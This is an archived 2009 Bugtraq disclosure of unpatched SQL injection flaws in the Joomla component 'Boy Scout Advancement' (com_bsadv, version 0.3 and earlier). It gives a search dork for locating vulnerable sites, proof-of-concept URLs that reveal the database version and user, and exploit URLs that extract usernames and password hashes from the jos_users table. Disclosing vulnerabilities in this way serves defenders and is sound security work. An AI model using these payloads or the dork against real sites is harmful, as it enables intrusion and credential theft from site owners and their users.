MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)-->

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout Advancement' <= v-0.3 (com_bsadv)-->
From: y3nh4ck3r@xxxxxxxxx
Date: Sun, 24 May 2009 19:26:59 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

------------------------------------------------------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Joomla Component 'Boy Scout 
Advancement' <= v-0.3 (com_bsadv)-->
------------------------------------------------------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://bsadv.sourceforge.net/
-->DOWNLOAD: http://bsadv.sourceforge.net/
-->DEMO: N/A
-->CATEGORY: Joomla/Component
-->DESCRIPTION: BSAdv is a Joomla 1.5 component for Boy Scout unit data and 
advancement
                data for Boy Scout Troops in the United States...
-->RELEASED: 2009-02-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK --> inurl:"?option=com_bsadv"
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: <= 0.3
-->Discovered Bug date: 2009-05-25
-->Reported Bug date: 2009-05-25
-->Fixed bug date: Not fixed
-->Info patch: Not fixed
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su 
apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



############################
///////////////////////////

SQL INJECTION VULNS (SQLi):

///////////////////////////
############################



<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON 
+++++++++++++++++--------->>>>



-------------------
PROOFS OF CONCEPT:
-------------------



[++] GET var --> 'id'


~~~~~> 
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,version(),database(),user()%23


[++] GET var --> 'id'


~~~~~> 
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+database(),version()%23&Itemid=57



[++[Return]++] ~~~~~> User, version or database.



-----------
EXPLOITS:
-----------



~~~~~> 
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=event&id=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),3,4+FROM+jos_users+WHERE+id=62%23



[++[Return]++] ~~~~~> Username:::password id=62



~~~~~> 
http://[HOST]/[PATH]/index.php?option=com_bsadv&controller=peruse&task=account&id=-1+UNION+ALL+SELECT+username,password+FROM+jos_users+WHERE+id=62%23&Itemid=57



[++[Return]++] ~~~~~> Username and password id=62



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

Prev by Date: [SECURITY] [DSA 1806-1] New cscope packages fix arbitrary code execution
Next by Date: Secunia Research: Sun Solaris "sadmind" Buffer Overflow Vulnerability
Previous by thread: [SECURITY] [DSA 1806-1] New cscope packages fix arbitrary code execution
Next by thread: Secunia Research: Sun Solaris "sadmind" Buffer Overflow Vulnerability
Index(es):
- Date
- Thread